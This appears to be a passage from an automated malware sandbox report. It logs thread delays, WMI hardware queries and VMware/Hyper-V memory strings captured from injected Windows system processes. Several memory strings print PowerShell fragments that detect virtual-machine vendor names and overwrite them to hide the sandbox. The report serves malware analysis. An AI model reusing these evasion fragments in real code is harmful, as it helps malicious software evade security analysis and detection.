          Source: C:\Windows\System32\svchost.exe TID: 3652Thread sleep time: -279000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2228Thread sleep count: 276 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2228Thread sleep time: -276000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4684Thread sleep count: 84 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4684Thread sleep time: -84000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2840Thread sleep count: 83 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2840Thread sleep time: -83000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 980Thread sleep count: 79 > 30
          Source: C:\Windows\System32\svchost.exe TID: 980Thread sleep time: -79000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6484Thread sleep count: 77 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6484Thread sleep time: -77000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6476Thread sleep count: 75 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6476Thread sleep time: -75000s >= -30000s
          Source: C:\Windows\System32\sihost.exe TID: 3476Thread sleep count: 67 > 30
          Source: C:\Windows\System32\sihost.exe TID: 3476Thread sleep time: -67000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5556Thread sleep count: 64 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5556Thread sleep time: -64000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1552Thread sleep count: 59 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1552Thread sleep time: -59000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3196Thread sleep count: 55 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3196Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3956Thread sleep count: 57 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3956Thread sleep time: -57000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4036Thread sleep count: 56 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4036Thread sleep time: -56000s >= -30000s
          Source: C:\Windows\System32\ctfmon.exe TID: 6596Thread sleep count: 54 > 30
          Source: C:\Windows\System32\ctfmon.exe TID: 6596Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\System32\dasHost.exe TID: 4152Thread sleep count: 50 > 30
          Source: C:\Windows\System32\dasHost.exe TID: 4152Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4636Thread sleep count: 48 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4636Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4616Thread sleep count: 47 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4616Thread sleep time: -47000s >= -30000s
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
          Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\sihost.exeLast function: Thread delayed
          Source: C:\Windows\System32\sihost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\ctfmon.exeLast function: Thread delayed
          Source: C:\Windows\System32\ctfmon.exeLast function: Thread delayed
          Source: C:\Windows\System32\dasHost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dasHost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
          Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
          Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
          Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_000002809238DCE0 FindFirstFileExW,131_2_000002809238DCE0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: svchost.exe, 00000070.00000000.1633069505.00000177808D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityVMware VMCI Bus Device{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityVMware VMCI Bus DevicePCI\L5GLB1OV&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FSystem.String[]VMware, Inc.VMware VMCI Bus DeviceSystemPCI\ZA2OC8U6&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FvmciOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
          Source: svchost.exe, 00000070.00000000.1631379586.000001778084D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityMicrosoft Hyper-V Virtualization Infrastructure Driver{4d36e97d-e325-11ce-bfc1-08002be10318}Win32_PnPEntityMicrosoft Hyper-V Virtualization Infrastructure DriverROOT\VID\0000System.String[]MicrosoftMicrosoft Hyper-V Virtualization Infrastructure DriverSystemROOT\VID\0000VidOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74m
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DiskVMware__
          Source: svchost.exe, 00000058.00000000.1501914715.000002AB7CC43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntitySCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: svchost.exe, 00000056.00000000.1485322322.0000029BC7A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
          Source: svchost.exe, 00000070.00000003.1934284685.00000177815E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
          Source: svchost.exe, 00000002.00000002.1398660296.000001635905D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1397704163.000001635383F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1398746540.0000016359062000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000051.00000002.2736429489.00000237CEF51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000006D.00000000.1614000316.0000028F03640000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006D.00000000.1615387516.0000028F03F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000000.1621428719.000001F22BA8C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000000.1623246902.000001F22C307000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006F.00000003.1650628550.000001F22C309000.00000004.00000001.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000074.00000000.1698828870.000001570B559000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000070.00000000.1649347225.0000017781213000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntitySCSI\DISK&VEN_LZ4ZTPLC&PROD_VIRTUAL_DISK\4&1656F219&0&000000VMware Virtual disk SCSI Disk DeviceWin32_ComputerSystemuser-PC(Standard disk drives)SCSI\DISK&VEN_U3GCMCE2&PROD_VIRTUAL_DISK\4&1656F219&0&000000VMware Virtual disk SCSI Disk DeviceSystem.String[]System.String[]disk{4d36e967-e325-11ce-bfc1-08002be10318}Disk driveWin32_PnPEntityOKDiskDriveWin32_PnPEntity
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DiskSCSI\RAW(Standard disk drives){4d36e967-e325-11ce-bfc1-08002be10318}DiskDrivediskSCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Win32_ComputerSystemWin32_PnPEntityuser-PCDisk driveOKVMware Virtual disk SCSI Disk DeviceVMware Virtual disk SCSI Disk Device
          Source: svchost.exe, 00000068.00000000.1573751858.0000014DE2102000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000058.00000000.1525438710.000002AB7F200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
          Source: svchost.exe, 00000058.00000000.1524317200.000002AB7F153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
          Source: dwm.exe, 00000039.00000000.1421438028.0000028F87CBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: svchost.exe, 00000058.00000000.1502549095.000002AB7CC93000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
          Source: svchost.exe, 0000000A.00000002.2516685763.0000025C04A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000068.00000002.2515892556.0000014DE2036000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
          Source: svchost.exe, 00000070.00000003.1915578900.00000177818B3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: stringComputer System ProductComputer System ProductTYVGCC0CC82742-52E4-CC1D-A08F-D3A4823E8F04VMware, Inc.None
          Source: svchost.exe, 0000000A.00000002.2555931604.0000025C04A7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: OfficeClickToRun.exe, 00000074.00000002.2726358341.000001570C0D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine)
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
          Source: svchost.exe, 00000058.00000000.1507183605.000002AB7D6CC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c29cbcceb42671d1430c5a2a776c
          Source: svchost.exe, 00000058.00000000.1525438710.000002AB7F200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c29cbcceb42671d1430c5a2a776cPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D812000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c29cbcceb42671d1430c5a2a776cPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
          Source: svchost.exe, 00000068.00000000.1572890773.0000014DE202B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000070.00000000.1665419098.0000017781800000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000000.1658423819.00000177814CA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000000.1635401063.00000177809CD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: svchost.exe, 00000070.00000000.1649347225.0000017781213000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: svchost.exe, 00000070.00000000.1649347225.0000017781213000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
          Source: svchost.exe, 00000070.00000000.1635401063.00000177809CD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityMicrosoft Hyper-V Generation Counter{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityMicrosoft Hyper-V Generation CounterACPI\VMW0001\7System.String[]MicrosoftMicrosoft Hyper-V Generation CounterSystemACPI\VMW0001\7gencounterOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74f
          Source: svchost.exe, 00000070.00000000.1631379586.000001778084D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000000.1666097721.00000177818B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: svchost.exe, 00000058.00000000.1524317200.000002AB7F153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D6DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
          Source: svchost.exe, 00000070.00000002.2809444149.00000177815B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Device
          Source: svchost.exe, 00000070.00000000.1666097721.00000177818B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityPCI\ZA2OC8U6&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FVMware VMCI Bus DeviceWin32_ComputerSystemuser-PCVMware, Inc.PCI\L5GLB1OV&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FVMware VMCI Bus DeviceSystem.String[]System.String[]vmci{4d36e97d-e325-11ce-bfc1-08002be10318}VMware VMCI Bus DeviceWin32_PnPEntityOKSystemWin32_PnPEntity
          Source: svchost.exe, 00000058.00000000.1501606126.000002AB7CC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000058.00000002.2553811851.000002AB7CC31000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisoron
          Source: svchost.exe, 00000058.00000000.1519460664.000002AB7DE12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
          Source: svchost.exe, 00000070.00000000.1666097721.00000177818B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityROOT\VID\0000Microsoft Hyper-V Virtualization Infrastructure DriverWin32_ComputerSystemuser-PCMicrosoftROOT\VID\0000Microsoft Hyper-V Virtualization Infrastructure DriverSystem.String[]Vid{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Virtualization Infrastructure DriverWin32_PnPEntityOKSystemWin32_PnPEntity
          Source: svchost.exe, 0000000A.00000002.2516685763.0000025C04A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: dialer.exe, 00000051.00000002.2736429489.00000237CEEF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`j
          Source: svchost.exe, 0000000A.00000002.2528081013.0000025C04A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}st
          Source: svchost.exe, 00000058.00000000.1524317200.000002AB7F153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
          Source: svchost.exe, 00000068.00000000.1573751858.0000014DE2102000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000068.00000002.2515892556.0000014DE2036000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
          Source: svchost.exe, 00000068.00000000.1572890773.0000014DE202B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c29cbcceb42671d1430c5a2a776c
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk
          Source: svchost.exe, 00000068.00000000.1573105114.0000014DE2040000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware__Virtual_disk____2
          Source: lsass.exe, 00000031.00000000.1407822225.000001BA8DA89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
          Source: svchost.exe, 0000000A.00000002.2528081013.0000025C04A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: olume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D: @
          Source: svchost.exe, 00000070.00000003.1915578900.00000177818B3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
